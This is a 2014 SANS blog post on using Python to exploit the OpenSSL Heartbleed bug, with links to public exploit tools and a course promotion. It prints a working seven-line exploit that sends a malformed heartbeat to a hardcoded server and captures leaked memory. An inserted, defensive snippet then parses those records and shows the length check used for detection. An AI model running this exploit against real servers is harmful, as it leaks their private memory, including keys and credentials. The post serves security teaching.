SANS Penetration Testing

SANS Python Pen Testers | Exploit Heartbleed Vulnerabilities | SEC573

Pen Testers use Python to assess Heartbleed vulnerabilities.

By Mark Baggett

Unless you've been living in a cave without access to the outside world, you already know that OpenSSL 1.0.1 suffers from a serious vulnerability that allows a remote attacker to extract data from the memory of a target computer. The vulnerability was first made "public" (by varying definitions of the word "public") on April 7th. The events leading up to the disclosure are interesting. If you haven't reviewed them, the Sydney Morning Herald does a great job of outlining them. Check it out here:

http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure-timeline-who-knew-what-and-when-20140415-zqurk.html

So while it is clear as mud who knew about the vulnerability and when, it is very clear what happened afterwards. A lot of people leveraged the power of Python to rapidly develop exploits that demonstrate the seriousness of the vulnerability.

The flaw was made public on April 7th. Shortly afterward, several tools were released. Jared Stafford (jspenguin) wrote the first public proof-of-concept Python tool to exploit the vulnerability. His tool, "SSLTEST.PY", was published here: http://s3.jspenguin.org/ssltest.py. As I write this, that website is unavailable, but several copies of his original tool are still available through pastebin.com: http://pastebin.com/WmxzjkXJ

The exploit was quickly modified and improved by takeshix (https://twitter.com/_takeshix). His version of the tool included support for several application layer protocols that use OpenSSL, such as secure email and SFTP. His update is called "HB-TEST.PY". This is probably the most widely used variant of the exploit, and it is available here: https://gist.github.com/takeshixx/10107280#file-hb-test-py

Several other interesting Python penetration testing tools were also published in short order, including a scanner written by Rahul Sasi, called "HEARTBEAT_SCANNER.PY", that looks for vulnerable servers. His code is available here:

https://bitbucket.org/fb1h2s/cve-2014-0160/src/bba16b3eedef0e92bd91fea496b00c92eb515e29/Heartbeat_scanner.py?at=master

Peter Wu (aka Lekensteyn) also posted a tool called "PACEMAKER.PY" that can be used to test/exploit client software. That's right — client software! You have to worry about more than just those nasty web servers. His tool is available here:

https://github.com/Lekensteyn/pacemaker

In no time at all we went from a new vulnerability disclosure all the way up to a wealth of new tools that exploit the vulnerability. So what do "ssltest.PY", "hb-test.PY", "heartbeat_scanner.PY" and "pacemaker.PY" all have in common? They are all PYTHON PROGRAMS! Why? Because Python in pen testing is awesome! Python is a "rapid deployment", "batteries included" language. That means the core set of libraries includes everything that you need to perform a wide variety of tasks, including developing exploits. Most tools only require a few lines of code. How simple is it to exploit this vulnerability with Python? You can do it in 7 lines of code. Check it out:

import socket
# Python 3 port: the original used str.decode('hex') under Python 2; bytes.fromhex() is the equivalent
# Open a TCP connection to the public demo server (Martin Bachmann's test host, see below)
sh = socket.socket()
sh.connect(("54.217.122.251", 443))
# TLS 1.1 ClientHello record: two cipher suites offered, no extensions
sh.send(bytes.fromhex("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000"))
helloresponse = sh.recv(8196)
# Heartbeat request: a 3-byte record whose payload_length field claims 0x4000 (16384) bytes
sh.send(bytes.fromhex("1803020003014000"))
# A vulnerable server answers with up to 16 KB of its process memory
data = sh.recv(8196)

The code is pretty straightforward. First, we import the socket module and create a new socket object called "sh". We can use this object to connect to, and interact with, a remote server. Next we use the "sh" object to connect to a remote target by providing an IP address and a port. In this case, I am targeting a public server that has been set up by Martin Bachmann so you can see how this vulnerability works. The URL for his server is http://heartbleed.insign.ch. Then we send the SSL Hello message followed by the Heartbeat message. In this case, I am transmitting the Hello and Heartbeat packets generated by Rahul Sasi's scanner that trigger the exploit. Then we capture the response containing the remote machine's memory into a variable called "data". That is it! You've exploited the vulnerability and captured the response.
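As an added example (not the post's code and not from any of the tools it names), the following Python 3 snippet decodes the two records the seven-line exploit sends and applies the RFC 6520 length check that patched OpenSSL and network detection rules use to recognise a malicious heartbeat. The WELL_FORMED_HEARTBEAT record is constructed here for comparison; everything else is parsed from the hex strings on this page.

```python
import struct

# The two records the post's seven-line exploit sends, copied from its hex strings.
CLIENT_HELLO = bytes.fromhex(
    "16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd96"
    "0000040033c01101000000")
MALICIOUS_HEARTBEAT = bytes.fromhex("1803020003014000")
# Constructed for comparison: a legitimate request with a 1-byte payload and 16 bytes of padding.
WELL_FORMED_HEARTBEAT = bytes.fromhex("180302001401000141" + "00" * 16)

MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding after the payload

def parse_record(raw):
    """Split one TLS record into (content_type, version, body); reject truncated input."""
    if len(raw) < 5:
        raise ValueError("record header truncated")
    ctype, version, length = struct.unpack("!BHH", raw[:5])
    body = raw[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than its length field")
    return ctype, version, body

def parse_client_hello(body):
    """Return the cipher suites and extensions length from a ClientHello handshake body."""
    if body[0] != 0x01 or int.from_bytes(body[1:4], "big") != len(body) - 4:
        raise ValueError("not a well-formed ClientHello")
    pos = 4 + 2 + 32                        # handshake header, client_version, 32-byte random
    pos += 1 + body[pos]                    # session_id (length-prefixed)
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]; pos += 2
    suites = [struct.unpack("!H", body[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                    # compression_methods (length-prefixed)
    ext_len = struct.unpack("!H", body[pos:pos + 2])[0] if pos + 2 <= len(body) else 0
    return {"cipher_suites": suites, "extensions_len": ext_len}

def check_heartbeat(body):
    """Apply the RFC 6520 length check that vulnerable OpenSSL omitted.
    Returns (hb_type, declared_payload_len, bytes_actually_present, is_malformed)."""
    hb_type, declared = struct.unpack("!BH", body[:3])
    present = len(body) - 3                 # payload + padding actually on the wire
    return hb_type, declared, present, declared + MIN_PADDING > present

if __name__ == "__main__":
    print(parse_client_hello(parse_record(CLIENT_HELLO)[2]))
    for rec in (MALICIOUS_HEARTBEAT, WELL_FORMED_HEARTBEAT):
        print(check_heartbeat(parse_record(rec)[2]))
```

The mismatch is visible in cleartext because the exploit sends its heartbeat before the handshake completes, which is why a passive sensor can apply the same check.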

Here are those 7 lines of code in action:

It is simple. Python empowers penetration testers. If you know how to use Python, you can go very quickly from a concept to working code. The SANS Python for Penetration Testers course, SEC573, is designed to teach you what you need to develop these kinds of tools on your own. The course is self-paced with no prerequisites and will meet you where you are. Even if you don't have any programming background, the course will have you developing your own tools in no time! The first two days cover all of the essentials of the language. If you already know how to code, don't worry. You will NOT be bored. Since this course is self-paced, you will sharpen your existing skills as well as develop new ones, through a series of self-guided pyWars challenges. Then you will write four new penetration testing tools ready for use in your next engagement. Finally, you will put your new tools and skills to the test in a team-based capture the flag event. Python is awesome and the SANS Python for pen testers course is the perfect place to learn new Python skills.

-Mark Baggett
@MarkBaggett

1 Comment

diana, posted April 24, 2014 at 6:48 AM:

Thanks for sharing this knowledge since HB is bleeding everywhere.
